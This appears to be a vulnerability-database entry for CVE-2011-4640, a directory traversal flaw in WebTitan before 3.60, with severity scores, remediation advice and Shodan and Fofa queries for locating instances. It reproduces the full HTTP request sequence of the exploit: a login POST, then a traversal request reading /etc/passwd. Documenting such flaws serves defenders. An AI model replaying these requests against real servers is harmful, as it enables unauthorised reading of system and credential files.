| Title | WebTitan < 3.60 - Local File Inclusion |
|---|---|
| Author | ctflearner |
| Severity | Medium |
| Impact | Attackers can read arbitrary files on the server by exploiting directory traversal, potentially exposing database credentials and sensitive configuration data. |
| Remediation | Update to WebTitan version 3.60 or later that properly validates and sanitizes file path parameters. |
| CVSS Score | 4 |
| EPSS Score | 0.12255 |
| CVE ID | CVE-2011-4640 |
| CWE ID | CWE-22 |
| Shodan Query | title:"WebTitan"http.favicon.hash:1090061843 |
| Fofa Query | icon_hash=1090061843title="webtitan" |
| Tags | cve cve2011 lfi spamtitan webtitan authenticated vuln |
Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
GET /login-x.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST /login-x.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
jaction=login&language=en_US&username=rYrBOW&password=XGmmTJ
GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-4640.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-4640.pcap
N/AN/A